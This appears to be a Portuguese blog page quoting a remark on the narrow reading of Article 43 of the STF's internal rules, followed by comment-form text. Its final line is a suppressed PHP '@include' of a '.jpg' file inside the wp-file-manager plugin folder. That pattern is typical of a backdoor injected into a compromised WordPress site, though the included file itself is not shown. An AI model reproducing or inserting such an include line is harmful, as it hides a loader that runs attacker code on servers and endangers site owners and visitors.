“O tão mencionado artigo 43 do Regimento Interno não deve ser interpretado extensivamente, pois quando ele foi elaborado visava à investigação de atos praticados unicamente na sede física do STF.”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";